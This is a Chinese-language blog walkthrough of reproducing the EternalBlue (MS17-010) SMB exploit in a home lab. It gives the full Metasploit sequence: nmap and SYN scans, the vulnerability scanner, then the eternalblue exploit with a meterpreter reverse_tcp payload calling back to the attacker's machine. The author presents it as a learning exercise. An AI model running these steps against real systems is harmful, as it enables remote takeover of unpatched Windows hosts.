美文网首页
永恒之蓝本地复现

永恒之蓝本地复现

作者: Leena_c9a7 | 来源:发表于2021-05-11 23:58 被阅读0次

    在某一次会议上发现我并不会永恒之蓝,所以,嗯,我来了。

    复现环境

    kali:192.168.233.145
    win7:192.168.233.146

    信息搜集

    nmap扫端口

    nmap -Pn 192.168.233.146

    image.png
    看到开放了445端口,而永恒之蓝(ms17-010)利用的就是445端口的smb服务。

    syn扫描模块

    除了nmap还可以直接用msf自带的syn扫描模块

    set rhosts 192.168.233.146 设置远端主机
    set ports 0-500 设置端口范围
    set threads 20 设置线程
    run 执行
    

    我这里报错了,但命令是没问题的


    image.png

    后来查了一下用sudo 起msfconsole就好了 这次的端口范围是0-1000(真的很慢就是了,20线程还慢成这样子,还是nmap好用)


    image.png

    进入msf框架

    msfconsole
    search ms 17-010

    image.png
    搜出不少东西,大体分为两部分,auxiliary(辅助)模块和exploit(攻击)模块。auxiliary/scanner/smb/smb_ms17_010是永恒之蓝扫描模块,探测主机是否存在MS17_010漏洞。
    exploit/windows/smb/ms17_010_eternalblue是永恒之蓝攻击代码,一般配合使用,前者先扫描,若显示有漏洞,再进行攻击。

    扫描是否存在ms 17-010

    use auxiliary/scanner/smb/smb_ms17_010
    然后看看必要的options
    show options

    image.png
    右边yes的就是必要选项
    RHOSTS 参数是要探测主机的ip或ip范围
    set RHOSTS 192.168.233.146
    RPORT参数是该主机的端口
    set RPORT 445
    执行
    run
    image.png
    看到探测说很可能能够会受到永恒之蓝漏洞的攻击。

    攻击

    首先攻击模块
    use exploit/windows/smb/ms17_010_eternalblue
    info命令查看这个漏洞的信息

    image.png
    show payloads
    该命令可以查看当前漏洞利用模块下可用的所有Payload
    image.png
    设置攻击负载
    set payload windows/x64/meterpreter/reverse_tcp
    设置好rhosts(远端ip) 和lhost(本地ip)
    image.png

    命令详情:
    —set payload windows/x64/meterpreter/reverse_tcp
    (要选用其他payload可以使用show payloads查看适合要攻击的目标主机的payload)
    —show options :使用该命令会列出使用当前模块所需配置的参数
    —set RHOST 目标主机地址 :该命令会设置好要攻击的目标主机地址
    —set LHOST 攻击机地址 :该命令设置攻击机的地址,使目标主机回连至攻击机
    —set LPORT 回连的端口 :该命令设置目标主机回连至攻击机的端口,默认为4444
    —run:开始攻击

    攻击成功后攻击机和目标主机之间会建立一个连接,得到一个meterpreter会话


    image.png

    第一个框说明可以利用
    第二个框说明已经覆盖完成


    image.png
    这里看到靶机和攻击机建立了一个shell连接,会话为session 1
    我们回到windows机器发现已经打黑屏了 image.png

    相关文章

      网友评论

          本文标题:永恒之蓝本地复现

          本文链接:https://www.haomeiwen.com/subject/oqkrdltx.html